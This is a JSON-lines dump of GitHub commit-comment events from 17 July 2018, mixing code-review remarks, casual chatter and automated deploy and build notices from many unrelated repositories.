{"id":"7974806694","type":"CommitCommentEvent","actor":{"login":"Doncassino"},"repo":{"name":"Doncassino/TriAzur_code"},"payload":{"comment":{"id":29730654,"position":null,"line":null,"path":null,"commit_id":"c9b6c9b3d3402de2e8fa8fc06c22c42839bffcc4","created_at":"2018-07-17T07:18:24Z","updated_at":"2018-07-17T07:18:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/b09e3ee0-bc62-4bd7-bcf6-7b033dada6af?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/57bc70fc-3a85-4eb7-a477-d1a67ac25fb2?env_id=ibm%3Ayp%3Aus-south \"TriAzurUE\") deployed [TriAzur_code](https://github.com/Doncassino/TriAzur_code/releases/tag/deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180717-071823 \"deploy-ibm-yp-eu-gb-TriAzur-TriAzur-20180717-071823\") to [TriAzur](https://console.bluemix.net/apps/11b7850a-b04f-4546-975c-fb2662c615cd?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:TriAzur:TriAzur\"), including this commit"}},"created_at":"2018-07-17T07:18:24Z"}
{"id":"7974808593","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730660,"position":null,"line":null,"path":null,"commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:18:51Z","updated_at":"2018-07-17T07:18:51Z","author_association":"MEMBER","body":"Ah they are duplications because they're not translated right?"}},"created_at":"2018-07-17T07:18:51Z"}
{"id":"7974810464","type":"CommitCommentEvent","actor":{"login":"handerek"},"repo":{"name":"handerek/token-profile"},"payload":{"comment":{"id":29730662,"position":null,"line":null,"path":null,"commit_id":"73cb3557135827f34abf8957d7ab27f93e64a30e","created_at":"2018-07-17T07:19:18Z","updated_at":"2018-07-17T07:19:18Z","author_association":"OWNER","body":"谢谢 "}},"created_at":"2018-07-17T07:19:18Z"}
{"id":"7974813740","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730667,"position":null,"line":null,"path":null,"commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:20:06Z","updated_at":"2018-07-17T07:20:06Z","author_association":"MEMBER","body":"I'm still worried that we're modifying so many files from the default Blockly. I wonder how we'll be able to maintain this fork. BTW are you regularly merging changes from Blockly already in this fork?"}},"created_at":"2018-07-17T07:20:06Z"}
{"id":"7974814249","type":"CommitCommentEvent","actor":{"login":"suzhuo8765243"},"repo":{"name":"suzhuo8765243/gitTest_checkbox_list-JS"},"payload":{"comment":{"id":29730669,"position":6,"line":75,"path":"index.html","commit_id":"3c951622bc6415f95839148cab1e4d83f6bc2fc5","created_at":"2018-07-17T07:20:13Z","updated_at":"2018-07-17T07:20:13Z","author_association":"OWNER","body":"这句有问题"}},"created_at":"2018-07-17T07:20:13Z"}
{"id":"7974814714","type":"CommitCommentEvent","actor":{"login":"desht"},"repo":{"name":"TeamPneumatic/pnc-repressurized"},"payload":{"comment":{"id":29730671,"position":25,"line":25,"path":"documentation/TechTreeRemarksAndProposal.md","commit_id":"a0a615d64a9cbd5ee436dc5f1201cfa14776f076","created_at":"2018-07-17T07:20:18Z","updated_at":"2018-07-17T07:20:18Z","author_association":"COLLABORATOR","body":"Might also be worth looking at how much pressure it takes to move items around.  Having played with it a little, it seems very expensive compared with other mods' solutions for item transport (which are mostly free once pipes are placed)."}},"created_at":"2018-07-17T07:20:18Z"}
{"id":"7974816356","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730674,"position":5,"line":466,"path":"build.py","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:20:41Z","updated_at":"2018-07-17T07:20:41Z","author_association":"MEMBER","body":"Why?\r\n\r\nCould you explain how this is related to \"Adds creation of Environment Variables feature in Velocity\"? Thx"}},"created_at":"2018-07-17T07:20:41Z"}
{"id":"7974817611","type":"CommitCommentEvent","actor":{"login":"AliakseiN"},"repo":{"name":"AliakseiN/ATJava"},"payload":{"comment":{"id":29730679,"position":null,"line":null,"path":null,"commit_id":"ec5dff54b25164c6a8754fe56a2be131ee0af6cc","created_at":"2018-07-17T07:20:57Z","updated_at":"2018-07-17T07:20:57Z","author_association":"OWNER","body":"\"Delete\" test"}},"created_at":"2018-07-17T07:20:57Z"}
{"id":"7974820596","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730686,"position":4,"line":17,"path":"demos/code/msg/en.js","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:21:38Z","updated_at":"2018-07-17T07:21:38Z","author_association":"MEMBER","body":"What is \"Context vars\"? For example \"Services\" is not related to context.\r\n\r\nMaybe you mean \"XWiki Bindings\" or \"XWiki Variables\"?"}},"created_at":"2018-07-17T07:21:38Z"}
{"id":"7974823468","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730690,"position":5,"line":5,"path":"generators/velocity/env_variables.js","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:22:02Z","updated_at":"2018-07-17T07:22:02Z","author_association":"MEMBER","body":"same here"}},"created_at":"2018-07-17T07:22:02Z"}
{"id":"7974824335","type":"CommitCommentEvent","actor":{"login":"MarioAslau"},"repo":{"name":"MarioAslau/React-Practice-ToDoList"},"payload":{"comment":{"id":29730693,"position":null,"line":null,"path":null,"commit_id":"e1183d79280b14cf3f65c5f6bb9b0a22cd7bcd5c","created_at":"2018-07-17T07:22:10Z","updated_at":"2018-07-17T07:22:10Z","author_association":"OWNER","body":"- notesFooter/noteButton CSS remains to be fixed\r\n- need to add authentication for Firebase"}},"created_at":"2018-07-17T07:22:10Z"}
{"id":"7974828220","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730700,"position":5,"line":4,"path":"msg/json/en.json","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:22:53Z","updated_at":"2018-07-17T07:22:53Z","author_association":"MEMBER","body":"That looks wrong since I don't think you're named Ellenn right? :)"}},"created_at":"2018-07-17T07:22:53Z"}
{"id":"7974856651","type":"CommitCommentEvent","actor":{"login":"N1gh7h4wk"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29730770,"position":7,"line":864,"path":"engine/class_modules/priest/sc_priest.cpp","commit_id":"499538f20f7d2ba38f7584cf7c5b83d742080395","created_at":"2018-07-17T07:29:08Z","updated_at":"2018-07-17T07:29:08Z","author_association":"CONTRIBUTOR","body":"is that a better way to do this?"}},"created_at":"2018-07-17T07:29:08Z"}
{"id":"7974859025","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730774,"position":5,"line":4,"path":"msg/json/en.json","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:29:37Z","updated_at":"2018-07-17T07:29:37Z","author_association":"COLLABORATOR","body":"@vmassol this is automatically generated, I didn't update the timestamp either, running build.py does that, and i could change the settings in js_to_json.py but that would just modify all the json language files, including the ones Ellen created and I'm not sure if I should do that since I just added a few fields :)"}},"created_at":"2018-07-17T07:29:37Z"}
{"id":"7974862184","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730782,"position":10,"line":10,"path":"msg/json/qqq.json","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:30:16Z","updated_at":"2018-07-17T07:30:16Z","author_association":"COLLABORATOR","body":"Again this has been removed automatically, I didn't make these changes manually"}},"created_at":"2018-07-17T07:30:16Z"}
{"id":"7974864465","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730785,"position":4,"line":69,"path":"msg/messages.js","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:30:46Z","updated_at":"2018-07-17T07:30:46Z","author_association":"COLLABORATOR","body":"My bad, I'll fix that"}},"created_at":"2018-07-17T07:30:46Z"}
{"id":"7974866646","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730791,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:31:16Z","updated_at":"2018-07-17T07:31:16Z","author_association":"NONE","body":"i didnt know you could code in xml"}},"created_at":"2018-07-17T07:31:16Z"}
{"id":"7974867532","type":"CommitCommentEvent","actor":{"login":"monajemi"},"repo":{"name":"ggjlab/scMCA"},"payload":{"comment":{"id":29730795,"position":null,"line":null,"path":null,"commit_id":"ee7d5907d50f8d87d442218215d5a1eb9828b5a2","created_at":"2018-07-17T07:31:27Z","updated_at":"2018-07-17T07:31:27Z","author_association":"NONE","body":"@bioeauty Hi YingCong, On page e6 of your paper \"Mapping the Mouse Cell Atlas by Microwell-Seq\", you write:\r\n\r\n> we used the reduced dataset with 60,000 cells and 6,298 marker genes of 98 cell clusters\r\n\r\nI have gotten the data of Figure2 (the 60k high quality genes), and I can see that dimensions of this DGE matrix is \r\n```\r\ndim(dge)\r\n[1] 25133 61637\r\n```\r\nWould you please clarify what was the method by which you chose `6,298 marker genes` out of `25133` genes available in the data. In particular, if I want to use smaller number of genes for clustering or classification, what is your recommended method for choosing $n$ genes from $N$ available genes such that its acceptable in your community.\r\n\r\nMuch appreciated, \r\nHatef  \r\n\r\n"}},"created_at":"2018-07-17T07:31:27Z"}
{"id":"7974869561","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730796,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:31:54Z","updated_at":"2018-07-17T07:31:54Z","author_association":"CONTRIBUTOR","body":"I bought a soap for cornier's bday\r\n\r\nit came with a manual so you know"}},"created_at":"2018-07-17T07:31:54Z"}
{"id":"7974871305","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"GuardianRM/Stockfish"},"payload":{"comment":{"id":29730803,"position":null,"line":null,"path":null,"commit_id":"1a3044e155ca2932a186ed2df850ed64d6b846f0","created_at":"2018-07-17T07:32:16Z","updated_at":"2018-07-17T07:32:16Z","author_association":"NONE","body":"I think i have tested too after i introduced this condition for null move pruning but it failed. But in the meantime some changes in search and stat updates have been committed so a retest can be done. Good luck!"}},"created_at":"2018-07-17T07:32:16Z"}
{"id":"7974874603","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730809,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:32:58Z","updated_at":"2018-07-17T07:32:58Z","author_association":"NONE","body":"give me manual i want to learn xml langugage\r\n"}},"created_at":"2018-07-17T07:32:58Z"}
{"id":"7974879660","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730821,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:34:04Z","updated_at":"2018-07-17T07:34:04Z","author_association":"CONTRIBUTOR","body":"would you like a manual?\r\n##or an operations manual?"}},"created_at":"2018-07-17T07:34:04Z"}
{"id":"7974881181","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730823,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:34:22Z","updated_at":"2018-07-17T07:34:22Z","author_association":"NONE","body":"whats dht difference"}},"created_at":"2018-07-17T07:34:22Z"}
{"id":"7974883907","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730828,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:34:58Z","updated_at":"2018-07-17T07:34:58Z","author_association":"CONTRIBUTOR","body":"the operations manual can help you eject a wii disc"}},"created_at":"2018-07-17T07:34:58Z"}
{"id":"7974886483","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730832,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:35:30Z","updated_at":"2018-07-17T07:35:30Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/18469146/42802939-1c9a7300-89ad-11e8-9ef8-3cd26047dcca.png)\r\n"}},"created_at":"2018-07-17T07:35:30Z"}
{"id":"7974887037","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29730834,"position":null,"line":null,"path":null,"commit_id":"a3881b994a97c8493c55e1e66cbece0aee7ae6b9","created_at":"2018-07-17T07:35:37Z","updated_at":"2018-07-17T07:35:37Z","author_association":"COLLABORATOR","body":"Puzzle `3-c5db1bb8` disappeared from [`node/app.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py), that's why I closed #31. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-17T07:35:37Z"}
{"id":"7974888867","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730840,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:36:00Z","updated_at":"2018-07-17T07:36:00Z","author_association":"NONE","body":"yay operations manul\r\nand standartd manul\r\nadadadsasd    ™️  :github: :has: :emotes: :lol:"}},"created_at":"2018-07-17T07:36:00Z"}
{"id":"7974888925","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"borisveytsman/acmart"},"payload":{"comment":{"id":29730841,"position":null,"line":null,"path":null,"commit_id":"cf11598562651878c41d27cd66b6c6744811b64e","created_at":"2018-07-17T07:36:01Z","updated_at":"2018-07-17T07:36:01Z","author_association":"NONE","body":"Ok, wasn't hard to fix. :)"}},"created_at":"2018-07-17T07:36:01Z"}
{"id":"7974890174","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730847,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:36:17Z","updated_at":"2018-07-17T07:36:17Z","author_association":"NONE","body":"#general"}},"created_at":"2018-07-17T07:36:17Z"}
{"id":"7974891977","type":"CommitCommentEvent","actor":{"login":"Andyshon"},"repo":{"name":"Andyshon/Journal"},"payload":{"comment":{"id":29730849,"position":null,"line":null,"path":null,"commit_id":"ad8f84f075dfec22d9873d5d0a6cdb483366d4fb","created_at":"2018-07-17T07:36:39Z","updated_at":"2018-07-17T07:36:39Z","author_association":"OWNER","body":"Since that commit next commits will include SQLite database"}},"created_at":"2018-07-17T07:36:39Z"}
{"id":"7974893888","type":"CommitCommentEvent","actor":{"login":"hxy-gg"},"repo":{"name":"hxy-gg/demo-test-1"},"payload":{"comment":{"id":29730860,"position":3,"line":1,"path":"REAMD.TXT","commit_id":"26fee68e2a05ed45af505e5e7e92f8f08a1fa0c4","created_at":"2018-07-17T07:37:03Z","updated_at":"2018-07-17T07:37:03Z","author_association":"OWNER","body":"看把你能的 以为自己很牛逼？"}},"created_at":"2018-07-17T07:37:03Z"}
{"id":"7974896710","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"Phylogeny/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29730865,"position":null,"line":null,"path":null,"commit_id":"2d78af0bb8c9260a9f7be47841fc73e91b9acab0","created_at":"2018-07-17T07:37:40Z","updated_at":"2018-07-17T07:37:40Z","author_association":"OWNER","body":"Oh, I didn't realize you left that comment on this commit. Not only does everything I said previously apply, but the adding of a backplate I mentioned was for the block models, not the item model I modified in this commit.\r\n\r\nWhen I said in this commit's message that I \"gave it a propper backplate\" I meant that I replaced the 8 mulicolored quads that comprised the current backplate of the item model (making it look oddly like it had 2 front sides) with a single white quad (a propper backing).\r\n\r\nIt's more efficient now; not less."}},"created_at":"2018-07-17T07:37:40Z"}
{"id":"7974898367","type":"CommitCommentEvent","actor":{"login":"dutch92"},"repo":{"name":"htmlacademy-javascript/566939-keksobooking"},"payload":{"comment":{"id":29730866,"position":5,"line":5,"path":"js/backend.js","commit_id":"b35c2a04bd702977e453158cf89a1c3e087cd7fc","created_at":"2018-07-17T07:38:02Z","updated_at":"2018-07-17T07:38:02Z","author_association":"COLLABORATOR","body":"твоя функция должна сама создавать xhr а не принимать его и изменять"}},"created_at":"2018-07-17T07:38:02Z"}
{"id":"7974898592","type":"CommitCommentEvent","actor":{"login":"mapkyca"},"repo":{"name":"idno/Known"},"payload":{"comment":{"id":29730867,"position":null,"line":null,"path":null,"commit_id":"6c3e2b3d762cdda49d90c0dbdfe80ca56d486e25","created_at":"2018-07-17T07:38:05Z","updated_at":"2018-07-17T07:38:05Z","author_association":"COLLABORATOR","body":"Coolio.\r\n\r\nWhat was the JS issue?"}},"created_at":"2018-07-17T07:38:05Z"}
{"id":"7974899978","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/three-ducks"},"payload":{"comment":{"id":29730870,"position":null,"line":null,"path":null,"commit_id":"81363bd1d28dbd7e7b16905c106a96e3511f66d5","created_at":"2018-07-17T07:38:23Z","updated_at":"2018-07-17T07:38:23Z","author_association":"OWNER","body":"Build version: __`1.7.0-renovate/semantic-release-npm-4.x.234`__ :crossed_fingers: [`renovate/semantic-release-npm-4.x`](https://github.com/streamich/three-ducks/tree/renovate/semantic-release-npm-4.x) on [*Travis*](https://travis-ci.org/streamich/three-ducks/builds/404767463) :tada:"}},"created_at":"2018-07-17T07:38:23Z"}
{"id":"7974901087","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29730873,"position":null,"line":null,"path":null,"commit_id":"cb4711b453621a499b716b7d35e663de5983f1d5","created_at":"2018-07-17T07:38:38Z","updated_at":"2018-07-17T07:38:38Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/7ffe34c2-266d-44f3-9173-2be3854ea28a?project=153942441948"}},"created_at":"2018-07-17T07:38:38Z"}
{"id":"7974901523","type":"CommitCommentEvent","actor":{"login":"EbenZhang"},"repo":{"name":"EbenZhang/VbSharpOutliner"},"payload":{"comment":{"id":29730874,"position":null,"line":null,"path":null,"commit_id":"09a0dee2d51cf094df8975080316302729f74dd9","created_at":"2018-07-17T07:38:44Z","updated_at":"2018-07-17T07:38:44Z","author_association":"OWNER","body":"Wrong commit message. Should be Stop supporting of VS2017."}},"created_at":"2018-07-17T07:38:44Z"}
{"id":"7974903642","type":"CommitCommentEvent","actor":{"login":"amroco"},"repo":{"name":"angmelanie/paulyplots"},"payload":{"comment":{"id":29730878,"position":null,"line":null,"path":null,"commit_id":"a8982724c918e3aa3524d45af5d0e898911a8810","created_at":"2018-07-17T07:39:12Z","updated_at":"2018-07-17T07:39:12Z","author_association":"NONE","body":"Your loyal following (me) is excited for the next update."}},"created_at":"2018-07-17T07:39:12Z"}
{"id":"7974907751","type":"CommitCommentEvent","actor":{"login":"zsau"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29730884,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T07:40:06Z","updated_at":"2018-07-17T07:40:06Z","author_association":"CONTRIBUTOR","body":"I thought the song list tooltips not appearing was what you were talking about in the commit message. Which other tooltips were broken?\r\n\r\nAnyway, the song list tooltips *do* appear when I use `set_xalign`. I'd assumed that was equivalent to setting `.xalign` directly, but obviously not.\r\n\r\nIt'd be good to add a test for this too, if possible. Any suggestions on how to implement one?"}},"created_at":"2018-07-17T07:40:06Z"}
{"id":"7974915854","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29730895,"position":null,"line":null,"path":null,"commit_id":"07657e8fe5e7b43cb57f231b9d3a3572afa65d8b","created_at":"2018-07-17T07:41:45Z","updated_at":"2018-07-17T07:41:45Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/8cb7d194-ccbe-42cb-be7f-17cbb21741e5?project=153942441948"}},"created_at":"2018-07-17T07:41:45Z"}
{"id":"7974916060","type":"CommitCommentEvent","actor":{"login":"mkh9901"},"repo":{"name":"mkh9901/Study"},"payload":{"comment":{"id":29730897,"position":null,"line":null,"path":null,"commit_id":"ccf8cf90b4284382e6a28f741f917b3ac6effe19","created_at":"2018-07-17T07:41:48Z","updated_at":"2018-07-17T07:41:48Z","author_association":"OWNER","body":"*공부 한 내용\r\n-Remix를 이용한 컨트랙트 연습\r\n\r\n*참고사항\r\n1.Run 탭창 클릭 -> 2. Environment  환경 \"Web3 Provider\" 설정 -> 3. 컨트랙트이름 확인 후 Create 하기 -> \r\n4. set 칸에 갑 입력후 set 클릭하고 get 버튼 클릭 \r\n(*2번 순서에서 포트 입력할 때 처음에 geth 생성 할 때 적은 포트로 입력 해야 한다.)\r\n(*당연히 채굴을 계속 해야 한다 안하고 Create 할 시 가스가 없다고 에러 뜸 )\r\n\r\n(*가장 최근에 나온 책을 보면서 공부를 하고 있지만 모든 프로그램 들이 버전이 업데이가 되어 수업에 차질이 생기고 있다. 문제점을 하나하나 검색하고 알아봐야한다. 나중에 조금이라도 도움이 되길 기원하면서....)"}},"created_at":"2018-07-17T07:41:48Z"}
{"id":"7974919458","type":"CommitCommentEvent","actor":{"login":"hey999999999"},"repo":{"name":"hey999999999/socketiosample"},"payload":{"comment":{"id":29730901,"position":null,"line":null,"path":null,"commit_id":"0c89bfae5015dbf13449edb54b7def03cda282a3","created_at":"2018-07-17T07:42:29Z","updated_at":"2018-07-17T07:42:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/81381c3b-a7c5-42d5-b5ba-ed63984ec8b6?env_id=ibm%3Ayp%3Aus-south \"nodedetoolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/c5766795-0b60-4c2a-9200-b500fcef6599?env_id=ibm%3Ayp%3Aus-south \"nodedetoolchain\") deployed [socketiosample](https://github.com/hey999999999/socketiosample/releases/tag/deploy-ibm-yp-us-south-jiec_taira-space_south-20180717-074228 \"deploy-ibm-yp-us-south-jiec_taira-space_south-20180717-074228\") to [space_south](https://console.bluemix.net/apps/3aec1428-59d8-47dd-9cb0-48f60f64aa03?env_id=ibm:yp:us-south \"ibm:yp:us-south:jiec_taira:space_south\"), including this commit"}},"created_at":"2018-07-17T07:42:29Z"}
{"id":"7974920027","type":"CommitCommentEvent","actor":{"login":"lctouchin"},"repo":{"name":"lctouchin/Share-idea"},"payload":{"comment":{"id":29730905,"position":null,"line":null,"path":null,"commit_id":"e63c52955165ca834404d992f818b5bde23b7d1a","created_at":"2018-07-17T07:42:36Z","updated_at":"2018-07-17T07:42:36Z","author_association":"OWNER","body":"第一次用GITHUB，传一个自己工作用的数据核查工具"}},"created_at":"2018-07-17T07:42:36Z"}
{"id":"7974920192","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/three-ducks"},"payload":{"comment":{"id":29730906,"position":null,"line":null,"path":null,"commit_id":"77bdce70fd528171ca09a928f55ef6476118a138","created_at":"2018-07-17T07:42:38Z","updated_at":"2018-07-17T07:42:38Z","author_association":"OWNER","body":"Build version: __`1.7.0-renovate/semantic-release-changelog-3.x.232`__ :crossed_fingers: [`renovate/semantic-release-changelog-3.x`](https://github.com/streamich/three-ducks/tree/renovate/semantic-release-changelog-3.x) on [*Travis*](https://travis-ci.org/streamich/three-ducks/builds/404767426) :tada:"}},"created_at":"2018-07-17T07:42:38Z"}
{"id":"7974920257","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29730907,"position":null,"line":null,"path":null,"commit_id":"1a2155ebf7d0ea3dedb19cf142381a58225fe20a","created_at":"2018-07-17T07:42:39Z","updated_at":"2018-07-17T07:42:39Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/e1c19fa3-0a81-4572-8487-866958e3db68?project=153942441948"}},"created_at":"2018-07-17T07:42:39Z"}
{"id":"7974922616","type":"CommitCommentEvent","actor":{"login":"tkasparek"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29730912,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-17T07:43:08Z","updated_at":"2018-07-17T07:43:08Z","author_association":"MEMBER","body":"Hello,\r\n\r\nthe best solution for you would be to upgrade to Spacewalk 2.5 (or higher) as these versions are not using entitlement certificate anymore.\r\n\r\nIf for some reason you want to stay at Spacewalk 2.4 (or lower), I've created new entitlement certificate. However I did use different GPG key for signing it so you will need to import it.\r\nInstructions how to import my GPG key, and re-activate Spacewalk can be found here: https://github.com/spacewalkproject/spacewalk/wiki/Refreshing-certificate\r\n\r\nBest regards,\r\nTomáš"}},"created_at":"2018-07-17T07:43:08Z"}
{"id":"7974925493","type":"CommitCommentEvent","actor":{"login":"moorejee"},"repo":{"name":"moorejee/deepStocks"},"payload":{"comment":{"id":29730920,"position":null,"line":null,"path":null,"commit_id":"005443ad4148678e6eff34d18475d024feff9913","created_at":"2018-07-17T07:43:43Z","updated_at":"2018-07-17T07:43:43Z","author_association":"OWNER","body":"model graph"}},"created_at":"2018-07-17T07:43:43Z"}
{"id":"7974926063","type":"CommitCommentEvent","actor":{"login":"bripkens"},"repo":{"name":"instana/nodejs-sensor"},"payload":{"comment":{"id":29730921,"position":null,"line":null,"path":null,"commit_id":"e6e12687bb0085b9ea3786683db044bf55bd667f","created_at":"2018-07-17T07:43:51Z","updated_at":"2018-07-17T07:43:51Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-17T07:43:51Z"}
{"id":"7974926767","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29730923,"position":8,"line":8,"path":"assets/sass/blocks/header.sass","commit_id":"ac3ad4b005acca8573243822448e0484a307df17","created_at":"2018-07-17T07:44:00Z","updated_at":"2018-07-17T07:44:00Z","author_association":"OWNER","body":"если хочешь изменить цвет всех ссылок на сайте по-умолчанию, это нужно делать тут - https://github.com/schrodinger-cat/markup-training/blob/master/assets/sass/common/_variables.sass#L29\r\n\r\nлибо вешать на ссылку отдельный класс и писать стили уже для этого класса"}},"created_at":"2018-07-17T07:44:00Z"}
{"id":"7974931654","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730935,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:45:05Z","updated_at":"2018-07-17T07:45:05Z","author_association":"MEMBER","body":"@Alej0hio The XML is from Nintendo's SOAP Server. However, Billy taught me the basics of XML and I only added the OSC Note and logged the SOAP. XP"}},"created_at":"2018-07-17T07:45:05Z"}
{"id":"7974934435","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29730946,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:45:41Z","updated_at":"2018-07-17T07:45:41Z","author_association":"CONTRIBUTOR","body":"billy is an\r\n## operations manual"}},"created_at":"2018-07-17T07:45:41Z"}
{"id":"7974934592","type":"CommitCommentEvent","actor":{"login":"maxarendsen"},"repo":{"name":"maxarendsen/kendo-global"},"payload":{"comment":{"id":29730947,"position":null,"line":null,"path":null,"commit_id":"664c60209e63dfa580d5afcb692ef342ca7bcdba","created_at":"2018-07-17T07:45:42Z","updated_at":"2018-07-17T07:45:42Z","author_association":"OWNER","body":"@nixa333 How can I create a pull request into your branch?"}},"created_at":"2018-07-17T07:45:42Z"}
